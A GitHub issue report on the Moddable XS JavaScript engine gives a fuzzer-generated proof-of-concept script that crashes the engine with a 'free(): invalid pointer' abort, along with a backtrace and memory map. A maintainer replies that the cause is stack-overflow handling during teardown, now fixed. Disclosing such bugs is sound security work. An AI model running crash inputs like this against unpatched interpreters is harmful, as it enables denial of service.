Moddable-OpenSource/moddable #376: free invalid pointer

rain6851, 2020-06-02:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function main() {
    let v2 = 0;
    var prGt = JSON;
    while (v2 < 10) {
        function v3(v4, v5, v6, v7, ...v8) {
            const v11 = Math.asinh(Int32Array);
            var MZCC = v11.constructor();
        }
        for (let v24 = 0; v24 < 10; v24++) {
            const v25 = v3();
            var sDYb = Date;
            var HpBB = Symbol;
        }
        const v26 = v2 + 1;
        var CfQP = v2.toFixed(v26);
        var akHP = new Object();
        var sWJC = escape('fw]/$_pc]=#T]MM11`');
        var aZec = main();
        var xwhW = JSON.parse('l<u0`I9');
        CfQP.length = v26;
        var BeHt = DataView;
        var zeij = JSON.stringify('CG&wE5qa41v)g?Wo3SCFw_');
    }
}
main();
```
# vulnerability analysis

The program has `free(): invalid pointer`, the following is the abnormal information.

```
Error: (host): stack overflow
*** Error in `../build/bin/lin/debug/xst': free(): invalid pointer: 0x00000000027cd610 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f551b3c67e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f551b3cf37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f551b3d353c]
../build/bin/lin/debug/xst(fxFree+0x2c4)[0x606864]
../build/bin/lin/debug/xst(fxDeleteMachine+0x199c)[0x438b2c]
../build/bin/lin/debug/xst(main+0x1163)[0x423283]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f551b36f830]
../build/bin/lin/debug/xst(_start+0x29)[0x425b49]
======= Memory map: ========
00400000-00812000 r-xp 00000000 08:01 997815                             /home/node/mmfuzzer/moddable/build/bin/lin/debug/xst
00a11000-00a12000 r--p 00411000 08:01 997815                             /home/node/mmfuzzer/moddable/build/bin/lin/debug/xst
00a12000-00a13000 rw-p 00412000 08:01 997815                             /home/node/mmfuzzer/moddable/build/bin/lin/debug/xst
027cd000-02826000 rw-p 00000000 00:00 0                                  [heap]
7f5510000000-7f5510021000 rw-p 00000000 00:00 0 
7f5510021000-7f5514000000 ---p 00000000 00:00 0 
7f5516f26000-7f5516f3c000 r-xp 00000000 08:01 1315952                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f5516f3c000-7f551713b000 ---p 00016000 08:01 1315952                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f551713b000-7f551713c000 rw-p 00015000 08:01 1315952                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f551713c000-7f5517147000 r-xp 00000000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7f5517147000-7f5517346000 ---p 0000b000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7f5517346000-7f5517347000 r--p 0000a000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7f5517347000-7f5517348000 rw-p 0000b000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7f5517348000-7f551b34f000 rw-p 00000000 00:00 0 
7f551b34f000-7f551b50f000 r-xp 00000000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7f551b50f000-7f551b70f000 ---p 001c0000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7f551b70f000-7f551b713000 r--p 001c0000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7f551b713000-7f551b715000 rw-p 001c4000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7f551b715000-7f551b719000 rw-p 00000000 00:00 0 
7f551b719000-7f551b731000 r-xp 00000000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7f551b731000-7f551b930000 ---p 00018000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7f551b930000-7f551b931000 r--p 00017000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7f551b931000-7f551b932000 rw-p 00018000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7f551b932000-7f551b936000 rw-p 00000000 00:00 0 
7f551b936000-7f551ba3e000 r-xp 00000000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7f551ba3e000-7f551bc3d000 ---p 00108000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7f551bc3d000-7f551bc3e000 r--p 00107000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7f551bc3e000-7f551bc3f000 rw-p 00108000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7f551bc3f000-7f551bc65000 r-xp 00000000 08:01 1332223                    /lib/x86_64-linux-gnu/ld-2.23.so
7f551be33000-7f551be37000 rw-p 00000000 00:00 0 
7f551be63000-7f551be64000 rw-p 00000000 00:00 0 
7f551be64000-7f551be65000 r--p 00025000 08:01 1332223                    /lib/x86_64-linux-gnu/ld-2.23.so
7f551be65000-7f551be66000 rw-p 00026000 08:01 1332223                    /lib/x86_64-linux-gnu/ld-2.23.so
7f551be66000-7f551be67000 rw-p 00000000 00:00 0 
7ffdb717c000-7ffdb719d000 rw-p 00000000 00:00 0                          [stack]
7ffdb71e6000-7ffdb71e8000 r--p 00000000 00:00 0                          [vvar]
7ffdb71e8000-7ffdb71ea000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted (core dumped)

```

rain6851, 2020-06-02:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-08-04:
The reason this script fails is because it overflows the JavaScript stack. XS properly detects that before any memory corruption can occur. However, in the process of terminating the virtual machine, the host runtime would generate a memory failure because it assumed that there was space on thee JavaScript stack. This has since been fixed.

closed 2020-08-04 by phoddie